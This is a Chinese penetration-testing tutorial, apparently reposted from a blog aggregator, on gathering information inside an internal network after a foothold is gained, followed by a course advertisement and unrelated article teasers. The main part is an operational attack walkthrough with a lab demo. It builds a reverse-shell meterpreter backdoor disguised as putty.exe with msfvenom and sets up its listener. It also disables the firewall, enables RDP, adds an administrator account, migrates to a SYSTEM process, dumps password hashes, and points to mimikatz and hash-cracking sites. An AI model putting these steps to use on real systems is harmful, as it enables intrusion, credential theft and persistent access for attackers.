内网渗透-内网信息收集

内网信息收集

文章目录

前言

当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。

msf模块中的信息收集

Msf模块
run post/
run post/windows/gather/
获取系统的分区情况
forensics(取证的模块)
run post/windows/gather/forensics/enum_drives

检测是否是虚拟机
run post/windows/gather/checkvm

靶机运行了哪些服务
run post/windows/gather/enum_services

安装了哪些应用
run post/windows/gather/enum_applications

是否有文件共享
run post/windows/gather/enum_shares

最近的操作
run post/windows/gather/dumplinks

安装了哪些补丁
run post/windows/gather/enum_patches

信息收集
scraper(是个脚本)
run scraper
收集完之后,会加载在指定文件
到文件中查看收集内容
cd /root/.msf4/log/scripts/
ls
cd scraper/
ls
cd 到指定的文件
ls
cat zhi.txt

显示乱码的话
chcp 65001
回到正常编码

run winenum
查看系统的路由,文件

msf反弹shell后的信息收集

MSF反弹shell
chcp 65001(返回的是utf-8的代码)

netsh advfirewall set allprofiles state off(关闭防火墙)
netsh advfirewall show allprofiles(查看所有配置)

shutdown -r -f -t 0(-f 强制重启),立即重启

看看3389端口
打开3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

利用该命令,在目标主机上添加用户
run getgui -u admin -p admin (设置密码是)
net localgroup adminstrators admin /add

(1)MSF信息收集
远程桌面连接
window(mstsce)
kali (rdesktop -u username -p password ip)

获取哈希值

查看远程桌面
screenshot
use espia
screengrab
screenshare

得到哈希值密码破解时权限不够
如何提高权限
pid迁移

  1. getpid
  2. ps 查进程,找NT SYSTEM的进程pid,svhost
  3. pid迁移,migrating pid
    getuid
    hashdump 获得哈希值

(2)凭证信息收集
window密码破解工具

  1. mimikatz
    (在内存中获取的密码)
    https://github.com/gentilkiwi/mimikatz/releases(win10下载网址)
    在window下使用是需要管理员权限的
    图片中是获得明文密码的语句
    privilege::debug //提升权限

2.wce
wce.exe -w 获取明文密码(只适用于win7的低版本)

3.pwddump7
得到hash值后可以放到这个网站去进行破解得到明文
https://www.objectif-securite.ch/ophcrack

http://www.cmd5.com/Default.aspx

4.procdump(免查杀的功能)

内网信息收集

先查看是否存在域

查看网段(s扫描器)
s.exe syn 192.168.0.0 192.168.255.255 80

抓包分析网络流量(分析流量看网段)meterpreter 抓取目标机所在网络流量

看进程
tasklist
netstat -ano
netstat -lntp(linux)

systeminfo(查看补丁列表)
net share

net user 查看本机共享列表和课访问的域共享列表
net localgroup admininistrators

query user || qwinsta 查看在线用户

route print(查看路由)

arp -a(同一网段的缓存表)

关闭防火墙
netsh advfirewall set allprofiles state off(03以后)
net sh firewall show config(查看防火墙配置)

netsh(可用于端口转发,连接内网时用)

域环境信息收集
远程登录不安全,用msf反弹shell比较安全

whoami /all(查看SID域账号,用于后面的票据伪造)

net user /domain 域中的用户
net time /domain 查看域控
net group “Domain computer” /domain 查看域控制器组

nbtscan(扫描同一网段中有哪些主机)

net view /domain 查询域
net group “domain computers” /domain 查询所有与成员计算机列表
cls 清屏
net accounts /domain 获取域密码信息

域内管理员信息
net group “domain admins” /domain 查询域管理员用户

msf加载powershell脚本进行信息收集

msf中信息收集工具
在会话中输入run winenum

powersploit
ls
找到路径
cd Recon
回到会话中
load powershell
powershell_import 刚刚的Recon的路径/PowerView.ps1
加载成功

powershell_execute get-NetDomain 查看当前的域有哪些
powershell_execute get-NetUser 当前的用户

powershell_execute get-NetComputer 扫域名
powershell_execute get-NetProcess 进程

扫端口
powershell_import 刚刚的Recon的路径/Invoke-Portscan.ps1
powershell_execute invoke-portscan 192.168.8.1,192.168.8.200 -ports “21,22,80,445,139”

empire(域渗透,内网收集)(在kali中打开)
./empire

我在kali中给大家演示一下powershell中的powersploit脚本,进行信息收集
首先就是在msf中生成一个后门程序shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.128 lport=4444 -x putty.exe -e x86/shikata_ga_nai -f exe -o shell.exe

将shell.exe上传到靶机中,点击回连shell,在kali中进行监听,在kali中打开msf,设置参数,进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.231.128
set lport 4444
run

进行一系列设置后,我们点击程序,发现返回了会话。

我们在kali中打开powersploit,找到这这个脚本,PowerView.ps1

找到这个路径
/usr/share/windows-resources/powersploit/Recon
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

在回到msf中加载powershell
load powershell

导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon//Powerview.ps1

执行脚本
powershell_execute get-NetDomain

我这里由于是用我本机做的实验,可能拿到的权限不是很高,所以不能做下一步的收集,但是对于win7的机器还是可以进行信息收集的

我们进行端口扫描
导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon/Invoke-Portscan.ps1

执行脚本
powershell_execute invoke-portscan 192.168.219.1,192.168.219.200 -ports “21,22,80,445,139”

端口扫描成功了。我们看看另外一个扫描方法吧。
run winenum

这里进行一系列自动化的信息收集,,将扫描结果输出到报告中,这里显示输出到以下文档中
/root/.msf4/logs/scripts/winenum/LAPTOP-5QFMU9N1_20220920.4003/LAPTOP-5QFMU9N1_20220920.4003.txt

我们进行查看文档

可能还是因为权限的问题,只能扫到这么多的信息了,但对于其他靶机来说,应该会有更全面的扫描结果的。

后记

内网的信息收集就讲解到这了,渗透的信息收集至关重要,对于后渗透阶段,有着举足轻重的作用,直接决定着后渗透阶段的战果如何。后面还有内网的代理穿透,以及横向移动,权限维持,痕迹清除等阶段,有时间,都会给大家总结的噢。

网络安全学习路线&学习资源

网络安全的知识多而杂,怎么科学合理安排?

下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!

初级网工

1、网络安全理论知识(2天)

①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)

①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)

①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)

①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)

①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)

①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

【“脚本小子”成长进阶资源领取】

7、脚本编程(初级/中级/高级)

在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。

8、超级网工

这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。

一些我自己买的、其他平台白嫖不到的视频教程:

需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。

网络安全学习路线&学习资源

结语

网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

特别声明:

此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1200641.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

耐达讯自动化Profibus光纤链路模块:跨行业通信的“隐形桥梁”,让控制更丝滑!

在现代工业自动化领域,无论是化工、电力、冶金还是制药,设备间的通信稳定性都是生产线的“生命线”。阀门定位器作为关键执行机构,其精准控制离不开可靠的通信协议支持。耐达讯自动化的Profibus光纤链路模块,凭借光纤技术突破传统…

BIO/NIO/AIO/Netty 知识点

I/O 的概念 I/O(Input/Output)指输入输出操作,是程序与外部设备(如磁盘、网络、键盘等)交互的过程。核心目标是实现数据的高效读写,分为磁盘 I/O、网络 I/O 等类型。同步 vs 异步、阻塞 vs 非阻塞 同步/异步…

【开题答辩全过程】以 基于BS结构的旅游网站的设计与实现为例,包含答辩的问题和答案

个人简介 一名14年经验的资深毕设内行人,语言擅长Java、php、微信小程序、Python、Golang、安卓Android等 开发项目包括大数据、深度学习、网站、小程序、安卓、算法。平常会做一些项目定制化开发、代码讲解、答辩教学、文档编写、也懂一些降重方面的技巧。 感谢大家…

不止于抓取:2026年自适应夹爪品牌推荐

在智能制造迈向高柔性、高精度与高智能的2026年,自适应夹爪品牌正成为工业自动化升级的关键推手。随着3C电子、新能源、半导体等高端制造领域对微米级操作、零损伤抓取和快速换型需求的激增,传统气动夹爪已难以满足现…

2026必备!自考论文难题TOP8 AI论文网站测评

2026必备!自考论文难题TOP8 AI论文网站测评 2026年自考论文写作工具测评:如何选择高效可靠的AI平台 随着自考人数的持续增长,论文写作已成为许多考生面临的重大挑战。面对选题困难、资料查找繁琐、格式规范不熟悉等问题,越来越多的…

考虑源-荷-储协同互动的主动配电网优化调度研究Matlab实现

✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。 🍎 往期回顾关注个人主页:Matlab科研工作室 👇 关注我领取海量matlab电子书和数学建模资料 &#…

强烈安利8个AI论文工具,MBA论文写作必备!

强烈安利8个AI论文工具,MBA论文写作必备! AI 工具如何助力 MBA 论文写作? 在当前的学术环境中,MBA 学生面临着越来越高的论文写作要求。无论是研究选题、数据整理,还是内容撰写和格式规范,每一个环节都可…

揭秘人工智能在网络安全中的应用与挑战

人工智能在网络安全中的应用与挑战 随着数字威胁的日益复杂化,网络安全领域正在经历一场由人工智能驱动的变革。人工智能,特别是机器学习,通过分析海量数据集来识别模式和异常,为防御者提供了强大的新工具。 核心技术应用 威胁检测…

9款AI写论文哪个好?宏智树AI实测封神,毕业论文全流程开挂

作为深耕论文写作科普的博主,每年毕业季都被同学们追着问“AI写论文工具到底选哪个”。为了给出最客观的答案,我耗时一周实测了高校生高频使用的9款真实AI工具,从学术合规性、功能完整性、成果适配度三大核心维度逐一打分。最终结果一目了然&…

写论文软件哪个好?宏智树 AI 凭 “真科研” 实力领跑学术写作赛道

毕业季的深夜,你是否也曾对着空白文档陷入迷茫?选题没方向、文献似乱麻、数据分析无头绪、查重降 AIGC 双重压力压得人喘不过气?作为深耕论文写作科普的教育测评博主,我实测十余款论文工具后发现,宏智树 AI&#xff08…

宏智树AI:ChatGPT学术版驱动,重塑学术写作新生态

在学术研究的赛道上,低效的文献梳理、繁琐的数据处理、严苛的学术规范,常让科研工作者与高校师生陷入创作困境。宏智树AI(官网:www.hzsxueshu.com),一款由ChatGPT学术版模型深度驱动、搭载AI5.0技术架构的专…

620-0085输入输出控制模块

620-0085 输入/输出控制模块(I/O Control Module)620-0085 是一款工业自动化系统中使用的 输入/输出控制模块,主要用于控制系统内部处理单元与现场 I/O 子系统之间的信号管理与调度,常见于老款或经典的分布式控制系统平台中。主要…

宏智树 AI:破解降重去 AIGC 双重难题,让论文回归学术本真

作为深耕论文写作科普的教育博主,后台每天都被两类求助刷屏:“查重率改到崩溃,越改语句越不通顺”“用 AI 写的初稿,导师一眼看出机器痕迹”。在学术检测技术全面升级的今天,论文合规早已不是 “降重就行”&#xff0c…

620-0086链路驱动器模块

620-0086 链路驱动器模块(Link Driver Module)620-0086 是一种用于工业自动化控制系统中的 链路驱动器模块。它的主要作用是在控制系统内部建立并维持通信链路,使控制中心与分布式 I/O 子系统之间的数据交换能够稳定可靠地进行。主要功能驱动…

Jenkinsfile编写全解析:从语法逻辑到团队协作,音视频项目自动化落地实践

在音视频开发领域,自动化构建部署是保障项目高效迭代的核心基础设施——无论是FFmpeg编解码模块的编译优化、Nginx-RTMP直播服务的部署升级,还是播放器SDK的打包发布,都需要一套稳定、可复用的自动化流程。Jenkinsfile作为Jenkins Pipeline的…

620-2032逻辑控制器模块

620-2032 逻辑控制器模块(Logic Controller Module)620-2032 是工业自动化控制系统中的一款 逻辑控制器模块,属于系统的核心控制单元之一。它主要负责执行控制逻辑、处理输入信号,并根据逻辑结果输出控制指令,协调现场…

M3U8深度解析:从原理到实战优化,搞定流媒体传输核心

在音视频直播、点播场景中,M3U8是绕不开的核心技术之一。作为HLS(HTTP Live Streaming)协议的灵魂,它凭借跨平台兼容性、自适应码率等特性,成为移动端和Web端流媒体传输的首选方案。本文将从原理、实操、优化、排障四个…

宏智树 AI:破解顶刊规范密码,AI 时代期刊论文的合规创作指南

随着《自然》《科学》等顶刊明确 AIGC 使用红线,APA、MLA 等格式规范迭代升级,期刊论文写作已进入 “智能赋能 合规优先” 的新阶段。很多科研人明明手握优质成果,却因选题错位、文献造假、图表不合规、AI 使用未声明等问题屡屡拒稿。作为深…

621-0010模拟输出模块

621-0010 模拟输出模块621-0010 是工业自动化系统中的 模拟输出模块,用于将控制系统的数字控制信号转换为现场可执行的连续模拟信号,以驱动阀门、变频器、执行器等设备。模块作用该模块位于控制系统与现场设备之间,将处理器或逻辑控制单元生成…

Deepoc具身大模型开发板:多模态融合的智能决策引擎

在机器人智能化升级的浪潮中,如何在不破坏原有机器人硬件架构的前提下,快速赋予机器人感知、理解、决策和执行能力,成为行业核心痛点。Deepoc具身大模型(VLA)外拓开发板应运而生,通过多模态融合技术&#x…